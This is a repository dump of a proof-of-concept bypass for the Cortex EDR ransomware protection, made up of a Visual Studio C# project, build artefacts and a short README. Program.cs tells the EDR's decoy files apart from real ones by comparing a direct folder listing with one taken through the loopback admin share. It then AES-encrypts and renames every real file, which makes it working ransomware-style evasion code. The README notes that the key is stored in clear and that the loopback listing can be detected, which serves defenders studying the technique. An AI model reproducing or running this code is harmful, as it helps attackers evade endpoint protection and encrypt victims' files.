├── .vs └── ConsoleApp1 │ ├── FileContentIndex │ ├── 7c2665b2-59b8-401d-b31d-c208e8626a13.vsidx │ └── read.lock │ └── v17 │ └── .suo ├── ConsoleApp1.sln ├── ConsoleApp1 ├── App.config ├── ConsoleApp1.csproj ├── Program.cs ├── Properties │ └── AssemblyInfo.cs ├── bin │ ├── Debug │ │ ├── ConsoleApp1.exe │ │ ├── ConsoleApp1.exe.config │ │ └── ConsoleApp1.pdb │ └── Release │ │ ├── ConsoleApp1.exe │ │ ├── ConsoleApp1.exe.config │ │ └── ConsoleApp1.pdb └── obj │ ├── Debug │ ├── .NETFramework,Version=v4.6.1.AssemblyAttributes.cs │ ├── ConsoleApp1.csproj.AssemblyReference.cache │ ├── ConsoleApp1.csproj.CoreCompileInputs.cache │ ├── ConsoleApp1.csproj.FileListAbsolute.txt │ ├── ConsoleApp1.csproj.SuggestedBindingRedirects.cache │ ├── ConsoleApp1.exe │ ├── ConsoleApp1.pdb │ └── DesignTimeResolveAssemblyReferencesInput.cache │ └── Release │ ├── .NETFramework,Version=v4.6.1.AssemblyAttributes.cs │ ├── ConsoleApp1.csproj.AssemblyReference.cache │ ├── ConsoleApp1.csproj.CoreCompileInputs.cache │ ├── ConsoleApp1.csproj.FileListAbsolute.txt │ ├── ConsoleApp1.csproj.SuggestedBindingRedirects.cache │ ├── ConsoleApp1.exe │ ├── ConsoleApp1.pdb │ └── DesignTimeResolveAssemblyReferencesInput.cache └── README.md /.vs/ConsoleApp1/FileContentIndex/7c2665b2-59b8-401d-b31d-c208e8626a13.vsidx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/casp3r0x0/CortexRansomBypass/06fe75c195db74ed033cd6d35550519d41f2aaa8/.vs/ConsoleApp1/FileContentIndex/7c2665b2-59b8-401d-b31d-c208e8626a13.vsidx -------------------------------------------------------------------------------- /.vs/ConsoleApp1/FileContentIndex/read.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/casp3r0x0/CortexRansomBypass/06fe75c195db74ed033cd6d35550519d41f2aaa8/.vs/ConsoleApp1/FileContentIndex/read.lock -------------------------------------------------------------------------------- 
/.vs/ConsoleApp1/v17/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/casp3r0x0/CortexRansomBypass/06fe75c195db74ed033cd6d35550519d41f2aaa8/.vs/ConsoleApp1/v17/.suo -------------------------------------------------------------------------------- /ConsoleApp1.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.6.33723.286 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ConsoleApp1", "ConsoleApp1\ConsoleApp1.csproj", "{06539075-2F37-441E-86D0-F46E1AA8D57A}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {06539075-2F37-441E-86D0-F46E1AA8D57A}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {06539075-2F37-441E-86D0-F46E1AA8D57A}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {06539075-2F37-441E-86D0-F46E1AA8D57A}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {06539075-2F37-441E-86D0-F46E1AA8D57A}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {3A5AA5E9-448D-4475-BFE6-D63F1C97FB65} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /ConsoleApp1/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /ConsoleApp1/ConsoleApp1.csproj: 
-------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {06539075-2F37-441E-86D0-F46E1AA8D57A} 8 | Exe 9 | ConsoleApp1 10 | ConsoleApp1 11 | v4.6.1 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | -------------------------------------------------------------------------------- /ConsoleApp1/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.IO; 4 | using System.Linq; 5 | using System.Security.Cryptography; 6 | using static System.Net.WebRequestMethods; 7 | 8 | class Program 9 | { 10 | static List decoyFiles = new List(); 11 | static List realFiles = new List(); 12 | 13 | static void CompareFiles(string[] files1, string[] files2) 14 | { 15 | foreach (var file1 in files1) 16 | { 17 | bool found = false; 18 | foreach (var file2 in files2) 19 | { 20 | if (Path.GetFileName(file1) == Path.GetFileName(file2)) // Only comparing file names 21 | { 22 | found = true; 23 | realFiles.Add(file1); 24 | break; 25 | } 26 | } 27 | 28 | if (!found) 29 | { 30 | decoyFiles.Add(file1); 31 | } 32 | } 33 | } 34 | 35 | static void EncryptFile(string filePath) 36 | { 37 | try 38 | { 39 | if (Path.GetExtension(filePath).Equals(".exe", StringComparison.OrdinalIgnoreCase)) 40 | { 41 | Console.WriteLine("Skipping encryption for executable files."); 42 | return; 43 | } 44 | 45 | using (Aes aes = Aes.Create()) 46 | { 47 | aes.KeySize = 256; 48 | aes.GenerateKey(); 49 | aes.GenerateIV(); 50 | 51 | byte[] key = aes.Key; 52 | byte[] iv = aes.IV; 53 | 54 | // Read original file content 55 | byte[] fileContent = System.IO.File.ReadAllBytes(filePath); 
56 | 57 | using (FileStream outputFileStream = new FileStream(filePath, FileMode.Create, FileAccess.Write)) 58 | using (CryptoStream cryptoStream = new CryptoStream(outputFileStream, aes.CreateEncryptor(), CryptoStreamMode.Write)) 59 | { 60 | outputFileStream.Write(key, 0, key.Length); // Store key (should use secure storage instead) 61 | outputFileStream.Write(iv, 0, iv.Length); // Store IV 62 | cryptoStream.Write(fileContent, 0, fileContent.Length); 63 | } 64 | } 65 | 66 | // Rename the file to .secure extension (corrected File.Move syntax) 67 | string newFilePath = Path.ChangeExtension(filePath, ".secure"); 68 | System.IO.File.Move(filePath, newFilePath); 69 | 70 | Console.WriteLine($"File encrypted successfully: {newFilePath}"); 71 | } 72 | catch (Exception ex) 73 | { 74 | Console.WriteLine($"Error: {ex.Message}"); 75 | } 76 | } 77 | 78 | static void Main() 79 | { 80 | 81 | string targetDirectory = @"\\127.0.0.1\C$\" + Directory.GetCurrentDirectory().Replace("C:\\",""); 82 | 83 | 84 | string[] files1 = Directory.GetFiles(Directory.GetCurrentDirectory()); 85 | 86 | string[] files2 = Directory.GetFiles(targetDirectory); 87 | 88 | CompareFiles(files1, files2); 89 | 90 | foreach (var file1 in decoyFiles) 91 | { 92 | Console.WriteLine($"File '{Path.GetFileName(file1)}' is a decoy !"); 93 | } 94 | Console.WriteLine("============================ Real Files ======================="); 95 | foreach (var file1 in realFiles) 96 | { 97 | Console.WriteLine($"File '{Path.GetFileName(file1)}' is a real encrypting ..... 
!"); 98 | EncryptFile(file1); 99 | } 100 | 101 | 102 | 103 | Console.ReadLine(); 104 | } 105 | } 106 | -------------------------------------------------------------------------------- /ConsoleApp1/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("ConsoleApp1")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("ConsoleApp1")] 13 | [assembly: AssemblyCopyright("Copyright © 2025")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 
20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("06539075-2f37-441e-86d0-f46e1aa8d57a")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /ConsoleApp1/bin/Debug/ConsoleApp1.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/casp3r0x0/CortexRansomBypass/06fe75c195db74ed033cd6d35550519d41f2aaa8/ConsoleApp1/bin/Debug/ConsoleApp1.exe -------------------------------------------------------------------------------- /ConsoleApp1/bin/Debug/ConsoleApp1.exe.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /ConsoleApp1/bin/Debug/ConsoleApp1.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/casp3r0x0/CortexRansomBypass/06fe75c195db74ed033cd6d35550519d41f2aaa8/ConsoleApp1/bin/Debug/ConsoleApp1.pdb -------------------------------------------------------------------------------- /ConsoleApp1/bin/Release/ConsoleApp1.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/casp3r0x0/CortexRansomBypass/06fe75c195db74ed033cd6d35550519d41f2aaa8/ConsoleApp1/bin/Release/ConsoleApp1.exe 
-------------------------------------------------------------------------------- /ConsoleApp1/bin/Release/ConsoleApp1.exe.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /ConsoleApp1/bin/Release/ConsoleApp1.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/casp3r0x0/CortexRansomBypass/06fe75c195db74ed033cd6d35550519d41f2aaa8/ConsoleApp1/bin/Release/ConsoleApp1.pdb -------------------------------------------------------------------------------- /ConsoleApp1/obj/Debug/.NETFramework,Version=v4.6.1.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.6.1", FrameworkDisplayName = ".NET Framework 4.6.1")] 5 | -------------------------------------------------------------------------------- /ConsoleApp1/obj/Debug/ConsoleApp1.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/casp3r0x0/CortexRansomBypass/06fe75c195db74ed033cd6d35550519d41f2aaa8/ConsoleApp1/obj/Debug/ConsoleApp1.csproj.AssemblyReference.cache -------------------------------------------------------------------------------- /ConsoleApp1/obj/Debug/ConsoleApp1.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | d5c660b065a06c458ab35a0b64f95402c8c1f5c5 2 | -------------------------------------------------------------------------------- /ConsoleApp1/obj/Debug/ConsoleApp1.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\hathh\Desktop\New folder 
(2)\ConsoleApp1\ConsoleApp1\bin\Debug\ConsoleApp1.exe.config 2 | C:\Users\hathh\Desktop\New folder (2)\ConsoleApp1\ConsoleApp1\bin\Debug\ConsoleApp1.exe 3 | C:\Users\hathh\Desktop\New folder (2)\ConsoleApp1\ConsoleApp1\bin\Debug\ConsoleApp1.pdb 4 | C:\Users\hathh\Desktop\New folder (2)\ConsoleApp1\ConsoleApp1\obj\Debug\ConsoleApp1.csproj.AssemblyReference.cache 5 | C:\Users\hathh\Desktop\New folder (2)\ConsoleApp1\ConsoleApp1\obj\Debug\ConsoleApp1.csproj.SuggestedBindingRedirects.cache 6 | C:\Users\hathh\Desktop\New folder (2)\ConsoleApp1\ConsoleApp1\obj\Debug\ConsoleApp1.csproj.CoreCompileInputs.cache 7 | C:\Users\hathh\Desktop\New folder (2)\ConsoleApp1\ConsoleApp1\obj\Debug\ConsoleApp1.exe 8 | C:\Users\hathh\Desktop\New folder (2)\ConsoleApp1\ConsoleApp1\obj\Debug\ConsoleApp1.pdb 9 | -------------------------------------------------------------------------------- /ConsoleApp1/obj/Debug/ConsoleApp1.csproj.SuggestedBindingRedirects.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/casp3r0x0/CortexRansomBypass/06fe75c195db74ed033cd6d35550519d41f2aaa8/ConsoleApp1/obj/Debug/ConsoleApp1.csproj.SuggestedBindingRedirects.cache -------------------------------------------------------------------------------- /ConsoleApp1/obj/Debug/ConsoleApp1.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/casp3r0x0/CortexRansomBypass/06fe75c195db74ed033cd6d35550519d41f2aaa8/ConsoleApp1/obj/Debug/ConsoleApp1.exe -------------------------------------------------------------------------------- /ConsoleApp1/obj/Debug/ConsoleApp1.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/casp3r0x0/CortexRansomBypass/06fe75c195db74ed033cd6d35550519d41f2aaa8/ConsoleApp1/obj/Debug/ConsoleApp1.pdb -------------------------------------------------------------------------------- 
/ConsoleApp1/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/casp3r0x0/CortexRansomBypass/06fe75c195db74ed033cd6d35550519d41f2aaa8/ConsoleApp1/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /ConsoleApp1/obj/Release/.NETFramework,Version=v4.6.1.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.6.1", FrameworkDisplayName = ".NET Framework 4.6.1")] 5 | -------------------------------------------------------------------------------- /ConsoleApp1/obj/Release/ConsoleApp1.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/casp3r0x0/CortexRansomBypass/06fe75c195db74ed033cd6d35550519d41f2aaa8/ConsoleApp1/obj/Release/ConsoleApp1.csproj.AssemblyReference.cache -------------------------------------------------------------------------------- /ConsoleApp1/obj/Release/ConsoleApp1.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | be4a5e5016ee5ea0374c3ab86bc4266f6ee19d4c 2 | -------------------------------------------------------------------------------- /ConsoleApp1/obj/Release/ConsoleApp1.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\hathh\Desktop\New folder (2)\ConsoleApp1\ConsoleApp1\bin\Release\ConsoleApp1.exe.config 2 | C:\Users\hathh\Desktop\New folder (2)\ConsoleApp1\ConsoleApp1\bin\Release\ConsoleApp1.exe 3 | C:\Users\hathh\Desktop\New folder (2)\ConsoleApp1\ConsoleApp1\bin\Release\ConsoleApp1.pdb 4 | 
C:\Users\hathh\Desktop\New folder (2)\ConsoleApp1\ConsoleApp1\obj\Release\ConsoleApp1.csproj.AssemblyReference.cache 5 | C:\Users\hathh\Desktop\New folder (2)\ConsoleApp1\ConsoleApp1\obj\Release\ConsoleApp1.csproj.SuggestedBindingRedirects.cache 6 | C:\Users\hathh\Desktop\New folder (2)\ConsoleApp1\ConsoleApp1\obj\Release\ConsoleApp1.csproj.CoreCompileInputs.cache 7 | C:\Users\hathh\Desktop\New folder (2)\ConsoleApp1\ConsoleApp1\obj\Release\ConsoleApp1.exe 8 | C:\Users\hathh\Desktop\New folder (2)\ConsoleApp1\ConsoleApp1\obj\Release\ConsoleApp1.pdb 9 | -------------------------------------------------------------------------------- /ConsoleApp1/obj/Release/ConsoleApp1.csproj.SuggestedBindingRedirects.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/casp3r0x0/CortexRansomBypass/06fe75c195db74ed033cd6d35550519d41f2aaa8/ConsoleApp1/obj/Release/ConsoleApp1.csproj.SuggestedBindingRedirects.cache -------------------------------------------------------------------------------- /ConsoleApp1/obj/Release/ConsoleApp1.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/casp3r0x0/CortexRansomBypass/06fe75c195db74ed033cd6d35550519d41f2aaa8/ConsoleApp1/obj/Release/ConsoleApp1.exe -------------------------------------------------------------------------------- /ConsoleApp1/obj/Release/ConsoleApp1.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/casp3r0x0/CortexRansomBypass/06fe75c195db74ed033cd6d35550519d41f2aaa8/ConsoleApp1/obj/Release/ConsoleApp1.pdb -------------------------------------------------------------------------------- /ConsoleApp1/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- 
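https://raw.githubusercontent.com/casp3r0x0/CortexRansomBypass/06fe75c195db74ed033cd6d35550519d41f2aaa8/ConsoleApp1/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## Cortex EDR Ransomware protection bypass 2 | 3 | 4 | This is an implementation of a Cortex EDR ransomware protection bypass. Program.cs lists the working directory twice, once directly and once through the loopback administrative share (`\\127.0.0.1\C$\...`), and treats file names that appear only in the direct listing as decoys; a process enumerating its own local folder through that loopback share is therefore a behaviour defenders can alert on. EncryptFile writes the AES key and IV in clear at the start of each output file, ahead of the ciphertext, so files processed by this proof of concept remain recoverable. 5 | 6 | 7 | You can find the full blog at: 8 | 9 | 10 | [https://www.pwntricks.com/Bypass-cortex-ransomware-protection](https://www.pwntricks.com/Bypass-cortex-ransomware-protection) 11 | --------------------------------------------------------------------------------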